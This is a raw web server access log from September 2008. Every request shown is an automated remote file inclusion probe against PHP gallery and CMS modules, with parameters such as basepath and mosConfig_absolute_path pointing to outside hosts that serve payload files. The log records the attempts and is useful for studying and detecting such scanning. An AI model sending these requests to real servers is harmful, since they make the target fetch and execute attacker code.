74.53.70.178 - - [04/Sep/2008:23:37:34 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:39:56 -0700] "GET /logs/access_080825.log/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:39:56 -0700] "GET /?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 916 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:39:56 -0700] "GET /logs/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.813" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:40:06 -0700] "GET /logs/access_080825.log/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:40:06 -0700] "GET /logs/access_080825.log/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:40:06 -0700] "GET /logs/access_080825.log/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:40:40 -0700] "GET /?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 916 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:40:06 -0700] "GET /?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 916 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:40:06 -0700] "GET /?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 916 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:40:06 -0700] "GET /logs/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:40:06 -0700] "GET /logs/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:40:06 -0700] "GET /logs/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.811" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:40:19 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:40:19 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:40:19 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:40:39 -0700] "GET /logs/access_080825.log/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:40:39 -0700] "GET /?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:40:39 -0700] "GET /logs/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:41:17 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:41:17 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:41:18 -0700] "GET /logs/access_080825.log/?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:41:18 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:41:18 -0700] "GET /?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:41:18 -0700] "GET /logs/?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.79" "www.jainvestigation.com"
81.23.226.2 - - [04/Sep/2008:23:41:44 -0700] "GET /logs/access_080825.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.67" "www.jainvestigation.com"
81.23.226.2 - - [04/Sep/2008:23:41:45 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.67" "www.jainvestigation.com"
81.23.226.2 - - [04/Sep/2008:23:41:45 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.67" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:42:34 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:42:34 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:42:35 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
24.242.184.98 - - [04/Sep/2008:23:44:55 -0700] "GET /logs/access_080825.log/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
24.242.184.98 - - [04/Sep/2008:23:44:56 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
24.242.184.98 - - [04/Sep/2008:23:44:56 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
74.53.199.146 - - [04/Sep/2008:23:46:02 -0700] "GET /logs/access.log//?sourcedir=http://www.nwstars.com/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
74.53.199.146 - - [04/Sep/2008:23:46:02 -0700] "GET //?sourcedir=http://www.nwstars.com/readme.txt???? HTTP/1.1" 200 916 "-" "libwww-perl/5.805" "jainvestigation.com"
74.53.199.146 - - [04/Sep/2008:23:46:02 -0700] "GET /logs//?sourcedir=http://www.nwstars.com/readme.txt???? HTTP/1.1" 200 1944 "-" "libwww-perl/5.805" "jainvestigation.com"
74.53.199.146 - - [04/Sep/2008:23:46:03 -0700] "GET /logs/access_080728.log//?sourcedir=http://www.nwstars.com/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
74.53.199.146 - - [04/Sep/2008:23:46:03 -0700] "GET /logs//?sourcedir=http://www.nwstars.com/readme.txt???? HTTP/1.1" 200 1944 "-" "libwww-perl/5.805" "www.jainvestigation.com"
74.53.199.146 - - [04/Sep/2008:23:46:03 -0700] "GET //?sourcedir=http://www.nwstars.com/readme.txt???? HTTP/1.1" 200 916 "-" "libwww-perl/5.805" "www.jainvestigation.com"
58.120.225.104 - - [04/Sep/2008:23:46:12 -0700] "GET /logs/access_080728.log//index.php?sourcedir=http://www.sgki.es.bw.schule.de/EHEMALIGE/phpBB2/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.jainvestigation.com"
43.244.132.32 - - [04/Sep/2008:23:46:12 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://seolinks.karpiknet.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.jainvestigation.com"
58.120.225.104 - - [04/Sep/2008:23:46:12 -0700] "GET //index.php?sourcedir=http://www.sgki.es.bw.schule.de/EHEMALIGE/phpBB2/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.jainvestigation.com"
58.120.225.104 - - [04/Sep/2008:23:46:12 -0700] "GET /logs//index.php?sourcedir=http://www.sgki.es.bw.schule.de/EHEMALIGE/phpBB2/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.jainvestigation.com"
222.236.221.63 - - [04/Sep/2008:23:46:20 -0700] "GET /logs/access_080728.log//index.php?sourcedir=http://www.sgki.es.bw.schule.de/EHEMALIGE/phpBB2/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.jainvestigation.com"
222.236.221.63 - - [04/Sep/2008:23:46:20 -0700] "GET /logs//index.php?sourcedir=http://www.sgki.es.bw.schule.de/EHEMALIGE/phpBB2/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.jainvestigation.com"
222.236.221.63 - - [04/Sep/2008:23:46:20 -0700] "GET //index.php?sourcedir=http://www.sgki.es.bw.schule.de/EHEMALIGE/phpBB2/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.jainvestigation.com"
74.53.199.146 - - [04/Sep/2008:23:46:24 -0700] "GET /logs/access_080801.log//?sourcedir=http://www.nwstars.com/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
58.120.225.104 - - [04/Sep/2008:23:46:29 -0700] "GET /logs/access_080801.log//index.php?sourcedir=http://www.sgki.es.bw.schule.de/EHEMALIGE/phpBB2/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.jainvestigation.com"
222.236.221.63 - - [04/Sep/2008:23:46:34 -0700] "GET /logs/access_080801.log//index.php?sourcedir=http://www.sgki.es.bw.schule.de/EHEMALIGE/phpBB2/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.jainvestigation.com"
222.236.221.63 - - [04/Sep/2008:23:46:38 -0700] "GET /logs/access_080728.log//index.php?sourcedir=http://www.sgki.es.bw.schule.de/EHEMALIGE/phpBB2/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.jainvestigation.com"
222.236.221.63 - - [04/Sep/2008:23:46:38 -0700] "GET //index.php?sourcedir=http://www.sgki.es.bw.schule.de/EHEMALIGE/phpBB2/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.jainvestigation.com"
222.236.221.63 - - [04/Sep/2008:23:46:38 -0700] "GET /logs//index.php?sourcedir=http://www.sgki.es.bw.schule.de/EHEMALIGE/phpBB2/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.jainvestigation.com"
222.236.221.63 - - [04/Sep/2008:23:46:46 -0700] "GET /logs/access_080801.log//index.php?sourcedir=http://www.sgki.es.bw.schule.de/EHEMALIGE/phpBB2/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:46:52 -0700] "GET /logs/access.log/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:46:52 -0700] "GET /?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 916 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:46:52 -0700] "GET /logs/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:47:46 -0700] "GET /?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 916 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:47:46 -0700] "GET /logs/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.813" "jainvestigation.com"
89.218.85.18 - - [04/Sep/2008:23:47:50 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
89.218.85.18 - - [04/Sep/2008:23:47:50 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
89.218.85.18 - - [04/Sep/2008:23:47:53 -0700] "GET /logs/access_080815.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
64.22.89.194 - - [04/Sep/2008:23:48:32 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://freewebtown.com/damie/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.jainvestigation.com"
64.22.89.194 - - [04/Sep/2008:23:48:32 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://freewebtown.com/damie/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.jainvestigation.com"
89.218.85.18 - - [04/Sep/2008:23:48:43 -0700] "GET /logs/access_080825.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:50:34 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:50:34 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:50:34 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:50:34 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:50:34 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:50:34 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:50:34 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:50:34 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:50:34 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
222.236.221.63 - - [04/Sep/2008:23:50:52 -0700] "GET /logs/access.log//index.php?sourcedir=http://www.sgki.es.bw.schule.de/EHEMALIGE/phpBB2/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "jainvestigation.com"
222.236.221.63 - - [04/Sep/2008:23:50:52 -0700] "GET /logs//index.php?sourcedir=http://www.sgki.es.bw.schule.de/EHEMALIGE/phpBB2/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "jainvestigation.com"
222.236.221.63 - - [04/Sep/2008:23:50:52 -0700] "GET //index.php?sourcedir=http://www.sgki.es.bw.schule.de/EHEMALIGE/phpBB2/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:53:00 -0700] "GET /logs/access.log/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:53:00 -0700] "GET /?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 916 "-" "libwww-perl/5.813" "jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:53:00 -0700] "GET /logs/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.813" "jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:53:47 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:53:47 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:53:47 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:53:51 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:53:51 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:53:51 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
24.242.184.98 - - [04/Sep/2008:23:55:00 -0700] "GET /logs/access_080825.log/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
24.242.184.98 - - [04/Sep/2008:23:55:01 -0700] "GET /?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 916 "-" "libwww-perl/5.65" "www.jainvestigation.com"
24.242.184.98 - - [04/Sep/2008:23:55:02 -0700] "GET /logs/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.65" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:55:05 -0700] "GET /logs/access.log/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:55:05 -0700] "GET /?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 916 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:55:05 -0700] "GET /logs/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:55:06 -0700] "GET /logs/access.log/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:55:06 -0700] "GET /?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 916 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:55:06 -0700] "GET /logs/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:55:44 -0700] "GET /logs/access.log/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:55:44 -0700] "GET /?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 916 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:55:44 -0700] "GET /logs/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.811" "jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:25 -0700] "GET /logs/access_080825.log/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:25 -0700] "GET /logs/access_080825.log/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:25 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:25 -0700] "GET /logs/access_080825.log/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:25 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:25 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:25 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:25 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:25 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:28 -0700] "GET /logs/access_080825.log/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:28 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:57:03 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:33 -0700] "GET /logs/access_080825.log/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:33 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:33 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:33 -0700] "GET /logs/access_080825.log/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:57:07 -0700] "GET /My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:56:34 -0700] "GET /logs/My_eGallery/public/mainGallery.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:35 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:35 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:35 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:36 -0700] "GET /logs/access_080815.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:36 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:56:36 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
